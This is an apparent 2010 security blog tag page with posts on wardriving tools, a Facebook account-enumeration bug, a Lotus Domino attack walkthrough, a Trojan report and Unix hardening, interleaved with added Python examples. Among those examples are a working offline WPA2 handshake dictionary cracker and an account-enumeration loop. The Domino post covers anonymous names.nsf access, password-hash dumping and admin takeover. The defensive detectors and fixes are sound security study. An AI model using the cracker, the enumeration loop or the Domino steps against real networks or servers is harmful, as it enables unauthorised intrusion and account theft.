Posts Tagged Security
Wardriving These Days (Part 2)
Posted by Mourad Ben Lakhoua in Pentesting, Tools on August 20, 2010
The tools from the first part would not be complete without SpoonWEP/SpoonWPA, first introduced in BackTrack 3. They are graphical front-ends for the aircrack-ng suite that let a pentester lock onto the access point's channel and attempt to crack the AP's WEP or WPA keys.
Another very interesting tool is Karmetasploit, which combines KARMA with Metasploit so you can run a fake access point, capture passwords, harvest data and launch browser attacks against the clients that connect to it.
Wireless penetration testing is not limited to software such as the BackTrack tool set; there are also ready-made hardware solutions such as the WiFi Pineapple. The trick is that nobody at home, in the office, in a coffee shop or at an airport would suspect that the Pineapple hides a rogue access point that can conduct a man-in-the-middle attack and capture every connected user's credentials. At the time of writing the WiFi Pineapple costs $119.
When people turn on their laptops, the wireless network manager automatically tries to reconnect to the networks it remembers, so the laptop starts sending out probe requests (the client-side counterpart of the beacons an access point sends). Each probe request asks "Is such-and-such wireless network around?", and the Pineapple answers every one of them: "Sure, I'm such-and-such wireless access point – let's get you online!"
The WiFi Pineapple is a battery-powered wireless hacking device based on the Fon 2100 access point.
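The behaviour described above is also what gives a Pineapple away: a legitimate AP answers probe requests only for its own SSID, whereas a KARMA-style rogue AP answers for every SSID it hears. The following is an added example, not code from the original post or from the Pineapple project; the frame records are constructed by hand (a real check would read them from airodump-ng or a monitor-mode capture) and the threshold of two SSIDs per BSSID is an assumed tunable.

```python
from collections import defaultdict

# Constructed sample of 802.11 management frames (not a real capture):
# (frame type, source MAC, SSID). The client probes for every network in its
# preferred list; the honest AP answers only its own SSID, the rogue AP answers all.
SAMPLE_FRAMES = [
    ("probe_req",  "aa:bb:cc:00:00:01", "HomeNet"),
    ("probe_req",  "aa:bb:cc:00:00:01", "OfficeWiFi"),
    ("probe_req",  "aa:bb:cc:00:00:01", "Airport_Free"),
    ("probe_resp", "00:18:84:11:11:11", "HomeNet"),       # honest AP
    ("probe_resp", "00:18:84:22:22:22", "HomeNet"),       # rogue AP
    ("probe_resp", "00:18:84:22:22:22", "OfficeWiFi"),    # rogue AP
    ("probe_resp", "00:18:84:22:22:22", "Airport_Free"),  # rogue AP
    ("probe_req",  "aa:bb:cc:00:00:02", "CoffeeShop"),
    ("probe_resp", "00:18:84:22:22:22", "CoffeeShop"),    # rogue AP
]

def ssids_answered_by(frames):
    """Map each responding BSSID to the set of SSIDs it claimed in probe responses."""
    answered = defaultdict(set)
    for kind, mac, ssid in frames:
        if kind == "probe_resp":
            answered[mac].add(ssid)
    return answered

def find_karma_aps(frames, threshold=2):
    """Return BSSIDs that answered probes for more than `threshold` distinct SSIDs.
    Multi-SSID APs legitimately advertise a few names, so the threshold is an
    assumed tunable; an AP that answers everything it hears is a KARMA/Pineapple
    style honeypot."""
    return sorted(mac for mac, ssids in ssids_answered_by(frames).items()
                  if len(ssids) > threshold)

def leaked_preferred_networks(frames):
    """Map each client MAC to the SSIDs it revealed in probe requests. This is the
    information a Pineapple feeds on, so it is also what a client audit should
    minimise (forget old networks, disable auto-connect to open ones)."""
    leaked = defaultdict(set)
    for kind, mac, ssid in frames:
        if kind == "probe_req":
            leaked[mac].add(ssid)
    return leaked

if __name__ == "__main__":
    answered = ssids_answered_by(SAMPLE_FRAMES)
    for bssid in find_karma_aps(SAMPLE_FRAMES):
        print("possible KARMA AP:", bssid, sorted(answered[bssid]))
    for client, ssids in leaked_preferred_networks(SAMPLE_FRAMES).items():
        print("client", client, "leaks", sorted(ssids))
```

Run it against a capture of your own environment: any BSSID that shows up in the first list deserves a closer look, and any client that shows up in the second with a long list of SSIDs is exactly the kind of victim the Pineapple is built for.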
make sure you subscribe to my RSS feed!
Vulnerability Makes All Facebook Accounts Exposed
Posted by Mourad Ben Lakhoua in Social Networking, Vulnerabilities, Vulnerabilities & attacks on August 13, 2010
A new vulnerability has been discovered in Facebook that allows an attacker to obtain information about any user of the social network: with nothing more than an email address, the attacker gets the victim's name and profile picture.
The vulnerability works regardless of the account's privacy settings. Even if your profile is hidden from all search engines, the information can still be retrieved.
The gathered information can be used for phishing attacks or for other purposes.
According to the researchers, if someone has a list of email addresses he knows nothing about, he can feed them to Facebook one by one (or in bulk, using a script) and the chances are he will get more than 50% hits. This is useful for phishing attacks: people are more easily convinced when they see their real names.
Alternatively, an attacker can generate email addresses at random and build a database of user names and pictures, which means you have no privacy and your information can be found easily.
Update:
Facebook, in a statement sent to SCMagazineUS.com on Thursday, said the glitch has been fixed.
“We have technical systems in place to prevent people’s names and profile photos from showing to unrelated users upon login, but a recently introduced bug temporarily prevented these from working as intended,” Facebook said in a statement. “We remedied the situation swiftly.”
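The underlying bug class is an account-existence oracle: the login page rendered the matching user's name and photo before the password had been verified, so the response for a real email differed from the response for an unknown one. The following is an added example, not Facebook's code or code from the original post; the user store, names, photo paths and passwords are constructed, and the PBKDF2 parameters are assumed. It shows the leaky flow beside a hardened one and the enumeration loop the researchers describe running against both.

```python
import hashlib
import hmac

# Constructed user store (not real accounts): email -> (salt, password hash, name, photo).
def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

_SALT = b"\x01" * 16  # a fixed salt only to keep the sample deterministic
USERS = {
    "alice@example.com": (_SALT, _hash("correct-horse", _SALT), "Alice Example", "/photos/alice.jpg"),
    "bob@example.com":   (_SALT, _hash("hunter2", _SALT), "Bob Example", "/photos/bob.jpg"),
}

def login_leaky(email, password):
    """Vulnerable flow: the name and photo are returned as soon as the e-mail
    matches, before the password is checked, and an unknown e-mail gets a
    different status. Either difference is enough to enumerate accounts."""
    user = USERS.get(email)
    if user is None:
        return {"status": "unknown_email"}
    salt, pw_hash, name, photo = user
    ok = hmac.compare_digest(_hash(password, salt), pw_hash)
    return {"status": "ok" if ok else "bad_password", "name": name, "photo": photo}

def login_fixed(email, password):
    """Hardened flow: one generic failure response, no profile data until the
    password is verified, and a dummy hash computation for unknown e-mails so
    response timing does not reveal existence either."""
    user = USERS.get(email)
    if user is None:
        _hash(password, _SALT)  # burn the same time as a real password check
        return {"status": "failed"}
    salt, pw_hash, name, photo = user
    if not hmac.compare_digest(_hash(password, salt), pw_hash):
        return {"status": "failed"}
    return {"status": "ok", "name": name, "photo": photo}

def enumerate_accounts(login, candidates):
    """The attack from the post: feed a list of e-mails with a junk password and
    keep every one whose response reveals a name. Against login_fixed every
    candidate looks identical, so nothing is learned."""
    found = {}
    for email in candidates:
        resp = login(email, "not-the-password")
        if "name" in resp:
            found[email] = resp["name"]
    return found

if __name__ == "__main__":
    guesses = ["alice@example.com", "nobody@example.com", "bob@example.com"]
    print("leaky:", enumerate_accounts(login_leaky, guesses))
    print("fixed:", enumerate_accounts(login_fixed, guesses))
```

The fix is not only about the rendered name: the status text, the HTTP status code and the response time must all be the same for unknown addresses and wrong passwords, and bulk submissions should additionally be rate-limited per source, since a generic response still lets an attacker confirm an account once he guesses the password.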
Wardriving These Days (part 1)
Posted by Mourad Ben Lakhoua in Pentesting, Tools on August 1, 2010
In the past it was very difficult to attack a wireless network: you had to search for the right software under a Linux distribution, check driver compatibility for injecting packets onto the network, and only then could you get access to the Wi-Fi network. The question is: do we still face the same difficulties today?
To answer this question we will look at some online resources for preparing the right distribution, so that the tools required to evaluate any wireless network can be obtained in a few steps.
Today we find two types of wireless network. The first are unencrypted networks, which need nothing more than a wireless adapter to connect. The second use encryption in one of three forms: WEP, which is no longer secure at all because it can be cracked reliably within a few minutes, although this type is now rarely found; and WPA or WPA2, which most networks use today.
First you need a copy of BackTrack; you can put it on a USB stick using UNetbootin so that you have it with you everywhere. Even if you forget your laptop, you can plug in the USB stick, boot from it and have all the required tools for the job.
Next, check that your wireless adapter supports monitor mode (and packet injection); the compatibility list on the Aircrack-ng portal covers this.
You are now ready to use the latest wardriving tools. The first is AUTOMATIC WPA HANDSHAKE CAPTURE, a Python script that helps you obtain WPA handshakes: you give it the WLAN interface and the MAC addresses of the AP and of a connected client, and it returns a traffic dump containing the handshake.
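What makes a captured handshake valuable is that the WPA/WPA2-PSK key schedule is entirely derivable from the passphrase, the SSID, the two MAC addresses and the two nonces, so a candidate passphrase can be verified offline against the MIC in the second EAPOL message. The following is an added example, not code from the original post or from aircrack-ng, that carries that derivation through: PMK via PBKDF2, PTK via the 802.11i PRF-512, and the HMAC-SHA1-128 MIC used by WPA2 (WPA1/TKIP uses HMAC-MD5 and is not handled). The handshake fields are constructed and the MIC is computed from a known passphrase so the example is self-consistent offline; in practice they come from the airodump-ng capture file.

```python
import hashlib
import hmac

def wpa_pmk(passphrase, ssid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the slow step that makes dictionary attacks cost ~4096 HMACs per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_512(key, label, data):
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1 blocks with a counter byte."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]

def wpa_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    The first 16 bytes are the KCK that keys the EAPOL MICs."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck, eapol_frame_with_zeroed_mic):
    """WPA2 MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_with_zeroed_mic, hashlib.sha1).digest()[:16]

def crack_handshake(handshake, wordlist):
    """Dictionary attack: PMK -> PTK -> MIC per candidate, compared with the
    captured MIC of message 2. Returns the passphrase or None."""
    for candidate in wordlist:
        pmk = wpa_pmk(candidate, handshake["ssid"])
        kck = wpa_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                      handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None

# Constructed handshake (assumed values, not a real capture). The EAPOL bytes are
# a stand-in for the message-2 EAPOL-Key body with its 16-byte MIC field zeroed;
# only their exact bytes matter to the HMAC, not their layout.
_SSID = "OfficeWiFi"
_AP = bytes.fromhex("001884111111")
_STA = bytes.fromhex("aabbcc000001")
_ANONCE = bytes(range(32))
_SNONCE = bytes(range(32, 64))
_EAPOL = bytes.fromhex("0103007502010a00") + bytes(8) + _SNONCE + bytes(16 + 8 + 8 + 8 + 16) + b"\x00\x16" + bytes(22)
_REAL_PASSPHRASE = "wardriving2010"

def _build_captured_handshake():
    pmk = wpa_pmk(_REAL_PASSPHRASE, _SSID)
    kck = wpa_ptk(pmk, _AP, _STA, _ANONCE, _SNONCE)[:16]
    return {"ssid": _SSID, "ap_mac": _AP, "sta_mac": _STA,
            "anonce": _ANONCE, "snonce": _SNONCE,
            "eapol": _EAPOL, "mic": eapol_mic(kck, _EAPOL)}

CAPTURED = _build_captured_handshake()
WORDLIST = ["password", "12345678", "wardriving2010", "letmein"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_handshake(CAPTURED, WORDLIST))
```

Because the SSID is the PBKDF2 salt, precomputed PMK tables only work per SSID, which is why tools such as aircrack-ng and coWPAtty bother with per-SSID rainbow tables and why a unique SSID plus a long random passphrase is the actual defence; nothing in the capture step can be prevented by the AP.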
GerixWiFiCracker is a graphical add-on to Aircrack-ng. To use it, go to the configuration settings, select the interface, then press "Start Sniffing and Logging" and "Perform a test of injection AP". With Gerix you can also create a fake AP on the channel of your choice, just as with airbase-ng: your PC then answers any probe request with a matching probe response, which tells the client to authenticate to your BSSID. Be aware that this also disrupts every real AP on the same channel.
These tools are an update to all the wireless penetration testing tools previously covered on SecTechno, and there are more to come.
To be continued….
Hacking Lotus Domino
Posted by Mourad Ben Lakhoua in Password Security, Pentesting, Vulnerabilities on July 12, 2010
IBM Lotus Domino Server is a solution for corporate environments that provides various services for managing electronic documents; it includes several modules such as a mail server, an HTTP server and a database. The current version is Lotus Domino 8.5.1.
To detect the server we start by scanning the network. The server usually runs a web interface (Lotus Domino httpd), so we run Nmap against the target network as follows:
nmap -sV -p 80 172.16.1.0/24
Nmap scan report for 172.16.1.7
Host is up (0.017s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Lotus Domino httpd
Now that the IP address of the Domino server is known, open your web browser to look at some of the Domino web pages, which also reveal the version: http://serverip/homepage.nsf.
You can use Google hacking to find web servers running Domino by searching for inurl:homepage.nsf; the results list thousands of Domino-based web pages. It is very important to note that you must not practise on these sites.
Usually when you install the Lotus client you need to connect to the server as a user, and an authentication screen appears that scares off inexperienced attackers. But if you take your time and check everything carefully, you will find the gaps and the administrators' mistakes.
Start by learning the important resources on the server. On Domino the most important files have the .NSF extension, so we have:
/names.nsf – the Domino Directory, the most important database in the Domino environment; it holds the user and server records, including file names and paths.
You can find other files with DominoHunter, which lists all the .nsf databases on a server. But what we need is the names.nsf database, which holds all mail addresses, user information, users' operating systems and Lotus Notes client versions, security settings and other important data.
Interestingly, on most Domino servers this file can be accessed by anonymous users =-).
Now, the kinds of information we need to take care of:
1. The list of user logins, so we can guess their passwords and identify which account is the administrator.
2. All of this information can be used in social engineering to trick untrained personnel.
3. names.nsf also records each user's OS version and Lotus Notes client version, which is very helpful for finding 0-days matching the users' applications and operating systems. Here an attacker could even use an Internet Explorer vulnerability to compromise some accounts.
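The configuration fault behind all of this is a database that opens for an unauthenticated HTTP client. A quick way to check your own server for it, and the core of what DominoHunter automates, is to request the well-known system databases without credentials and look at the status code. The following is an added example, not code from the original post or from DominoHunter: names.nsf, homepage.nsf and webadmin.nsf come from the post, the remaining database names are standard Domino system databases assumed as defaults, and the `fetch` parameter is an injection point so the logic can be exercised offline.

```python
import urllib.error
import urllib.request

# names.nsf, homepage.nsf and webadmin.nsf are named in the post; the others are
# standard Domino system databases (assumed defaults, extend for your environment).
DEFAULT_DATABASES = [
    "names.nsf", "homepage.nsf", "webadmin.nsf", "log.nsf", "catalog.nsf",
    "domcfg.nsf", "admin4.nsf", "events4.nsf", "statrep.nsf", "domlog.nsf",
]

def http_status(url, timeout=5):
    """Fetch a URL anonymously (no credentials, no cookies) and return the HTTP
    status code, or None if the server could not be reached."""
    req = urllib.request.Request(url, headers={"User-Agent": "domino-check/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code          # 401/403/404 arrive as HTTPError
    except urllib.error.URLError:
        return None

def probe_databases(base_url, databases=DEFAULT_DATABASES, fetch=http_status):
    """Return {database: status}. 200 means it opens for Anonymous, 401/403 means
    authentication is enforced, 404 means it is absent under that name."""
    base = base_url.rstrip("/")
    return {db: fetch(f"{base}/{db}") for db in databases}

def anonymously_readable(results):
    """The databases an unauthenticated user can open: the admin faults the post describes."""
    return sorted(db for db, status in results.items() if status == 200)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://172.16.1.7"
    results = probe_databases(target)
    for db, status in results.items():
        print(f"{db:14s} {status}")
    print("anonymous access:", anonymously_readable(results))
```

A 200 for names.nsf is the finding to fix first: set the Anonymous entry in the database ACL to No Access (or at most Depositor) and, for the web, require authentication on the server document; webadmin.nsf should never answer anonymously at all. Run this only against servers you are authorised to test.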
Information gathering is not all that is possible. In 2005 a vulnerability was discovered that allows an attacker to obtain the Internet password hashes of users. It is not difficult to exploit, because every user's password hash is stored in the hidden HTTPPassword or dspHTTPPassword field of the person document, depending on the version.
Strangely, this vulnerability remains unfixed.
The number of users can be in the hundreds or thousands, so you will need to collect all the hashes automatically. In 2007 a tool named Raptor_dominohash was released that dumps all users' password hashes.
DominoHashBreaker is another useful tool; it tries to recover the clear-text form of the password with a dictionary attack. Its goal is to let an administrator check the strength of the users' passwords.
For the best results, however, use John the Ripper with the Jumbo patch, which adds support for modern password hashes: all you need to do is feed it HASH.txt (one username:hash per line). Once you recover one account's password you will know the password policy for all users, and obtaining the whole password list will not take much time. These passwords are for Domino web access.
If we have the administrator's password, fine; if not, we repeat the previous steps. The interesting thing is that the admin password opens webadmin.nsf (servername/webadmin.nsf), the administration interface of the Lotus Domino web server, and with access to it you can add, remove or modify users.
Domino uses another protocol, NRPC on port 1352, for the Lotus Notes and Lotus Designer clients. The client must present a certificate proving its identity, stored in a file with the .ID extension, and there is a password authentication mechanism as well.
The password is used to decrypt the ID file, so to access any Domino account over NRPC we need two things: the ID file and its password. This is more complicated than web access, but still possible.
To get the ID file you can exploit a weakness in Lotus Domino where the server keeps a copy of the user's ID file on the server; with the user logins obtained from names.nsf you can retrieve the IDs. For the ID password there are three free tools that can search for it: ID Password Recovery, Lotus Notes Password Recovery and Notes Password Recovery.
This post gives a clear picture of the different configuration faults that can exist in a Domino server, where a small vulnerability can allow an outsider to take full control of the server and manipulate a corporation's most sensitive information.
Reference: http://dsecrg.com/pages/pub/show.php?id=2
Fake Windows IME Trojan
Posted by Mourad Ben Lakhoua in Cybercrime & Hacking, Vulnerabilities & attacks on July 11, 2010
Security researchers at Websense have discovered a new Trojan that abuses a Windows system feature to disable and delete antivirus software and compromise the victim's machine.
The malicious program installs itself as a Windows input method editor (IME), then stops all AV processes and deletes their executable files, masquerading in the system as an antivirus update package.
Websense has published a blog post describing how this Trojan infects a Windows system. After the malware runs, a file named winnea.ime is created in the Windows system folder.
When the default input method is opened, the newly created winnea.ime starts searching for and detecting antivirus products.
At the same time, winnea.ime drops a file called pcij.sys into the system folder and loads it as a driver.
Next, control codes are sent to the pcij.sys driver through DeviceIoControl, and the driver kills the running process of any antivirus on its list. Doing the killing from kernel mode is what lets the Trojan defeat the self-protection most AV products apply to their user-mode processes.
Clearly the Windows input method is now a popular way for attackers to get malicious code loaded.
Black Hat USA 2010
Posted by Mourad Ben Lakhoua in Security events, hacking on July 11, 2010
At the end of this month Black Hat USA 2010 takes place in Las Vegas, where new vulnerabilities, tools and programs will be presented.
Black Hat is the biggest and most important hacking event on the planet, attracting thousands of experts from around the world. This year Black Hat celebrates its 13th anniversary. Among the sessions is a cyber war discussion by General Michael V. Hayden, former director of the National Security Agency and the Central Intelligence Agency.
About 30 new vulnerabilities and 46 tools will be presented, and 25 independent researchers will demonstrate the latest cutting-edge technology.
Widely known speakers contributing to the event include:
• “Cyber war…Are we at war? And if we are, how should we fight it?” presented by General Michael V. Hayden, former Director, National Security Agency and Central Intelligence Agency
• “Jackpotting Automated Teller Machines Redux” by Barnaby Jack
• “Wardriving the Smart Grid: Practical Approaches to Attacking Utility Packet Radios” by Shawn Moyer and Nathan Keltner
• “How to Hack Millions of Routers” by Craig Heffner
• “These Aren’t the Permissions You’re Looking For” by Anthony Lineberry
• “App Attack: Surviving the Mobile Application Explosion” by John Hering and Kevin Mahaffey
• “Hacking and Protecting Oracle Database Vault” by Esteban Martinez Fayo
• “Token Kidnapping’s Revenge” by Cesar Cerrudo
• “HTTPS Can Byte Me” by Robert Hansen and Josh Sokol
• “USB – HID, The Hacking Interface Design” by Richard Rushing
For more information you can visit the official website.
Keep Your Unix-Based System Safe This Summer (Part1)
Posted by Mourad Ben Lakhoua in Best Practices, Open-Source, Safety rules on June 27, 2010
Protecting your systems against all manner of intrusions makes your digital life safer: using complex passwords, checking files regularly for changes, and restricting anything and everything will keep these threats away.
Computers remain the easiest targets to compromise when physical access is available. At schools, universities, cafés or the airport many people leave their computers without locking the session.
Locking the screen is the first and most important reflex for protecting your machine physically. The screen can be locked with a keyboard combination: Ctrl+Alt+L (KDE and GNOME) or Ctrl+Alt+Del (Xfce). The same can be done from the command line:
KDE $ qdbus org.freedesktop.ScreenSaver /ScreenSaver Lock
GNOME $ gnome-screensaver-command -l
Xfce $ xflock4
For other environments you can use:
$ xscreensaver-command -lock
If no locker is active, install xlock or xscreensaver. The console equivalent is vlock, which also helps lock the popular terminal multiplexers GNU Screen and tmux that we covered in a previous post.
Locking the screen is of little benefit if booting from CD/USB is left enabled at BIOS level, because many Linux live CDs can be used to reset the various session passwords.
Booting from any media other than the hard disk should be disabled, and a password set on the CMOS setup. For better protection, also restrict /etc/securetty, the file that lists the terminals on which the root account is allowed to log in.
If someone has managed to steal your password, use the last command to display the list of users who logged in (and out) since the wtmp file was created, or check the shell history files (~/.history, ~/.bash_history) for traces.
Then there are some important things to do while installing or using the system:
1 – Do not click on icons you do not recognise, since various malicious UNIX shell commands can hide behind them.
2 – Do not use configuration files without reading them.
3 – Do not install software patches without reading their contents, or at least make sure they were obtained from reliable sources. There is no guarantee that a patch does not contain a backdoor or malicious code.
4 – Do not install packages manually from third-party websites. Every normal distribution has a remote repository in which every package carries a verification hash (and a signature). In an extreme case, download the package only from sites that identify themselves with certificates.
5 – Always download into a temporary subdirectory of your home directory and check the contents before unpacking.
6 – Create a file named «-i» in the root directory (touch /-i). If someone runs rm -rf * there, the shell expands the glob to include -i, which rm takes as the option to prompt before deleting each file.
In the next part we will look at further configuration to keep your Unix-based system safe this summer.
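The "regular file check against changes" mentioned at the start of the post is easy to build yourself: hash every file once, store the hashes somewhere the attacker cannot rewrite, and compare on each run. The following is an added example, not code from the original post or from any existing integrity checker such as Tripwire or AIDE; the sample file trees are constructed, and the choice of SHA-256 and of skipping symlinks are design assumptions.

```python
import hashlib
import json
import os

def snapshot(files):
    """Hash an in-memory mapping {path: bytes} with SHA-256. snapshot_tree() feeds
    it real file contents; the constructed samples below feed it directly."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}

def snapshot_tree(root):
    """Walk a directory and hash every regular file. Symlinks are skipped so a
    planted link cannot point the check at an attacker-chosen file."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            with open(full, "rb") as fh:
                files[os.path.relpath(full, root)] = fh.read()
    return snapshot(files)

def compare(baseline, current):
    """Report what changed since the baseline: modified, added and removed paths."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }

def save_baseline(baseline, path):
    with open(path, "w") as fh:
        json.dump(baseline, fh, indent=1, sort_keys=True)

def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)

# Constructed sample trees (not real system files): a replaced binary and a dropped file.
BEFORE = {"bin/ls": b"ls v1", "etc/passwd": b"root:x:0:0", "etc/securetty": b"tty1\n"}
AFTER = {"bin/ls": b"ls trojaned", "etc/passwd": b"root:x:0:0",
         "etc/securetty": b"tty1\n", "tmp/.hidden": b"backdoor"}

if __name__ == "__main__":
    print(compare(snapshot(BEFORE), snapshot(AFTER)))
```

Take the baseline with `snapshot_tree("/usr/bin")` (or any directory you care about) immediately after a clean install, write it with `save_baseline` to read-only media such as a CD or a write-protected USB stick, and run `compare` from a live CD rather than from the possibly compromised system: an attacker with root on the box can replace both the baseline file and the checker itself, which is why the BIOS boot restrictions above and this check only work together.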
Security Acts Magazine No.3
Posted by Mourad Ben Lakhoua in Security Magazine on June 21, 2010
The third edition of Security Acts Magazine has been published. This issue includes a short and hopefully interesting article I submitted on wireless penetration testing (wardriving).
Wish you a happy reading!
http://www.securityacts.com/securityacts03.pdf
McAfee 2010 First Quarter Threat Report
Posted by Mourad Ben Lakhoua in Anti-Viruses, News on May 19, 2010
McAfee has issued its regular quarterly threat report, which points to the major network threats of the first quarter of this year. During this period the biggest threat to computers was USB-borne malware: attackers continue to exploit the ability to launch applications automatically (AutoRun) from external devices.
The report also notes that fake AV products increased in number and expanded their activities in this period. As for spam, about 139 billion spam messages were detected, roughly 89% of all email. 71% of the spam was medical, 10% fell into the general category and 2% advertised fake educational diplomas or degrees. The leading sources of this spam were China, South Korea and Vietnam.
McAfee also said that malware and spam in Thailand, Romania, the Philippines, India, Indonesia, Colombia, Chile and Brazil had surged along with the growing number of Internet users.
Compared with the last two years, the total number of malicious programs in this period decreased; however, McAfee expects the number of viruses in the next quarter to remain the same as last year.